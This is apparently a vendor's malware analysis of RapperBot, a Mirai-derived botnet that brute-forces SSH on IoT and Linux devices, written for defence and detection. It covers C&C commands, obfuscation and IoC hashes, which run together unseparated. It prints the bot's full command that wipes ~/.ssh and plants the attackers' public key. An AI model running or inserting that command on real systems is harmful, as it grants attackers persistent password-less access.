RapperBot: A new threat for IoT devices

Summary

  • Discovered in June 2022
  • Has borrowed code from Mirai Bot
  • Targets Linux devices with ARM, MIPS, SPARC and x86 architectures
  • Uses own SSH authorized key to connect to the device
  • Has own identifier on targeted servers
  • Has a hardcoded bot ID for registration

On June 22, 2022, CNCERT IoT Threat Research Team and NSFOCUS FuYingLab monitored a new botnet that was attacking IoT devices. Naming the threat ‘RapperBot,’ researchers found more than 5,000 compromised hosts, but no attack commands were spotted.

In analyzing samples, cybersecurity analytics found similarities with Mirai Bot, whose source code has been leaked. RapperBot has samples for different architectures such as ARM, MIPS, SPARC and x86, and works as an SSH brute-forcer.

Technical details

Overview

Viewing RapperBot samples in Intezer Analyze, we can see that it has borrowed code from Mirai. Those samples were developed for different architectures, such as ARM, MIPS, SPARC and x86.

Acronis
Source: Intezer (SHA256:dcdeedee4736ec528d1a30a585ec4a1a4f3462d6d25b71f6c1a4fef7f641e7ae)

Execution

RapperBot's main goal is to brute-force SSH servers with password authentication. This is the main difference from Mirai Bot, which was brute-forcing Telnet servers. RapperBot can connect and brute-force any SSH server, which uses Diffie-Hellman Group 1 (768 bytes), Group 14 (2048 bytes) and AES128-CTR cryptographic algorithms for key exchanging and data encryption, respectively.

Acronis

In the first samples, the passwords that are used to brute-force were hardcoded in the binary. The ‘.data’ section includes 57 passwords that look weak and easy to guess.

Acronis

Later samples don't have hardcoded passwords — instead, RapperBot obtains them from the C&C server. This allows threat actors to refresh their list without updating the malware.

RapperBot has the string ‘SSH-2.0-HELLOWORLD,’ which is used to identify itself to the target SSH server. One of the saved strings contains a command that replaces victims’ ~/.ssh/authorized_keys with its own SSH public key. This allows threat actors to authorize the targeted server without any passwords.

Acronis

Full command and SSH key:

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== helloworld">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~;

The earliest-spotted RapperBot samples contained stored SSH commands, which were executed on compromised servers. One of these commands is ‘wget,’ which downloads data from a given IP address. In the later samples these commands were removed.

Acronis
SHA256:3b5d0075255c5df72bed53ec0154a612db416cbeda109df822593ee5424d3b1e

These samples also have a hardcoded string with Instagram tag and YouTube link, which were displayed at the start of execution. The Instagram account is empty and a YouTube link leads to the rap music clip (hence the name ‘RapperBot’).

Acronis

IP addresses are obtained during execution, loading hardcoded numbers to the calculating function.

Acronis

Looking at the list of cross references to this function, we can see that this function is called in a lot of places in the code, meaning that these samples can have many IP addresses of remote servers.

Acronis

These samples have stored 32 bytes for packets which will be sent to the server. Those bytes are the bot ID. The packet size will be 74 bytes, so other bytes in the packet will be filled with “00”.

Acronis
Acronis

When preparing the packet to be sent, RapperBot can change the 33rd byte to one of the next values:

Code
Command
0x00
Register
0x01
Keep alive
0x02
Client terminate
0x03
Perform an attack
0x04
Stop all attacks

Then it starts to send messages. This sample has functions to send messages over TCP and UDP. Unfortunately, these samples couldn’t connect to the servers at the time of this analysis because they had already gone offline.

Acronis

The latest samples (‘bchlhz0a5.dll’), found from July 2022, feature some differences from the earlier ones. What first catches the eye is the low number of strings — only nine, while the previous sample has 92. This is because the strings are separated by one character and concatenated during execution.

Acronis

The latest samples also use the same packet structure as the previous ones.

Acronis

Obfuscation

RapperBot uses functions call obfuscation, loading the calls’ addresses into one of the general-purpose registers before calling them.

Acronis

Later samples have string obfuscation, saving them separated by one character and concatenating them before usage.

Acronis

Conclusion

RapperBot borrowed code from Mirai Bot but it has its own implementations, such as a C&C protocol. The earliest-discovered samples have differences from later ones, including the presence of some SSH commands and string obfuscations. It sets its own authorized key to provide connection without any passwords, and to identify itself to the targeted server it uses the ‘SSH-2.0-HELLOWORLD’ string. It has saved a bot ID, which is used in bot registration and has five different commands to communicate with the server.

While targeting IoT devices, it may also pose a threat to Linux-based machines, for which Acronis Cyber Protect also has anti-malware functionality.

Detected by Acronis

Acronis Cyber Protect detects RapperBot samples on various architectures.

Acronis
ARM
Acronis
Intel 80386
Acronis
MIPS

IoCs

Files

Architecture
SHA256
Intel 80386
3b5d0075255c5df72bed53ec0154a612db416cbeda109df822593ee5424d3b1e92ae77e9dd22e7680123bb230ce43ef602998e6a1c6756d9e2ce5822a09b37b488bbb772b8731296822646735aacbfb53014fbb7f90227b44523d7577e0a7ce6dcdeedee4736ec528d1a30a585ec4a1a4f3462d6d25b71f6c1a4fef7f641e7ae8380321c1bd250424a0a167e0f319511611f73b53736895a8d3a2ad58ffcd5d51d5e6624a2ce55616ef078a72f25c9d71a3dbc0175522c0d8e07233115824f96ff09cf7dfd1dc1466815d4df098065510eec504099ebb02b830309067031fe04
ARM
a31f4caa0be9e588056c92fd69c8ac970ebc7e85a68615b1d9407a954d4df45dE8d06ac196c7852ff71c150b2081150be9996ff670550717127db8ab855175a823a415d0ec6d3131f1d537836d3c0449097e98167b18fbdbf2efca789748818aE8f1e8ec6b94ea54488d5f714e71e51d58dcdfe4be3827c55970d6f3b06edf7323256f231f3d91b0136b44d649b924552607a29b43a195024dbe6cde5b4a28ad9d234e975e4df539a217d1c4386822be1f56cea35f7dd2aa606ae4995894da422479932a6690f070fa344e5222e3fbb6ad9c880294d5b822d7a3ec27f1b8b8d5Ddf5aff0485f395c7e6c3de868b15212129962b4b9c8040bef6679ad880e3f31E56edaa1e06403757e6e2362383d41db4e4453aafda144bb36080a1f1b899a0255ff25b090dc1b380d8ca152428ba28ec14e9ef13a48b3fd162e965244b0d39b8e9f87bb25ff83e4ad970366bba47afb838028f7028ea3a7c73c4d08906ec102
MIPS
05c78eaf32af9647f178dff981e6e4e43b1579d95ccd4f1c2f1436dbfa0727ad77b2e5fb5b72493bde35a6b29a66e6250b6a5a0c9b9c5653957f64a12c793cd5F5ff9d1261af176d7ff1ef91aa8c892c70b40caa02c17a25de22539e9d0cdd26746106403a98aea357b80f17910b641db9c4fedbb3968e75d836e8b1d5712a62d86d158778a90f6633b41a10e169b25e3cb1eb35b369a9168ec64b2d8b3cbeec
SPARC
c83f318339e9c4072010b625d876558d14eaa0028339db9edf12bbcafe6828bbEbb860512a55c1cdc8be1399eec44c4481aedb418f15dbda4612e6d38e9b90101975851c916587e057fa5862884cbac3fa1e80881ddd062392486f5390c86865